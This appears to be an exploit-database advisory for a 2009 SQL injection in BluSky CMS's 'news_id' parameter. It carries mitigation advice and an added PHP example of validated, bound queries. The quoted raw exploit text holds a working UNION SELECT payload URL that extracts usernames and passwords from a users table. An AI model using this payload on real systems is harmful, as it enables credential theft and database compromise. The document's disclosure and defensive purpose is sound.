Vendor: BluSky CMS
By: Snakespc
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: BluSky CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

BluSky CMS Remote SQL Injection Vulnerability

BluSky CMS is prone to a remote SQL injection vulnerability. The issue affects the 'news_id' parameter of the 'index.php' script when 'news_act' is set to 'read'. An attacker can exploit it to manipulate SQL queries and gain access to the application's database, exposing sensitive information that may aid in further attacks and potentially compromising the application and any data made available through it.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use a least-privileged account, with only the privileges necessary to perform its function.
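
One way to apply this mitigation to a 'news_id'-style lookup, shown as an added example that is not BluSky CMS code and not part of the original advisory. The `demo_news` table, its columns, the function names and the in-memory SQLite database are assumptions made for illustration; it contrasts a concatenated query with strict integer validation plus a bound parameter.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the CMS database (constructed sample rows).
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE demo_news (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO demo_news VALUES (1, 'Welcome'), (2, 'Release notes')");
    return $db;
}

// Vulnerable pattern: the request value becomes part of the SQL text,
// so its content can change the structure of the query.
function read_news_vulnerable(PDO $db, string $newsId): array {
    $sql = 'SELECT id, title FROM demo_news WHERE id = ' . $newsId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive integer, then pass it as a
// bound parameter so it is always treated as data, never as SQL.
function read_news_safe(PDO $db, string $newsId): array {
    $id = filter_var($newsId, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];  // reject anything that is not a positive integer
    }
    $stmt = $db->prepare('SELECT id, title FROM demo_news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = make_db();
$malformed = '0 OR 1=1';  // constructed non-integer value for news_id

printf("vulnerable, malformed id: %d row(s)\n",
       count(read_news_vulnerable($db, $malformed)));
printf("hardened, malformed id:   %d row(s)\n",
       count(read_news_safe($db, $malformed)));
printf("hardened, id=1:           %d row(s)\n",
       count(read_news_safe($db, '1')));
```

Validation and parameter binding are applied together here: the validation rejects malformed requests early, and the bound parameter keeps the query structure fixed even if a validation rule is later loosened.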

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
BluSky CMS  Remote SQL Injection Vulnerability
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------
Script:BluSky CMS    www.qsix.org
Demo:www.qsix.org/page-3.html
--------------------------SNAKES TEAM------------------------------------
Exploit:
--------
Demo:
http://www.qsix.org/demo/index.php?&news_act=read&news_id=-1+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8+from+demo_users--
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
--------------------------SNAKES TEAM------------------------------------
ALL www.SnakespC.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-04]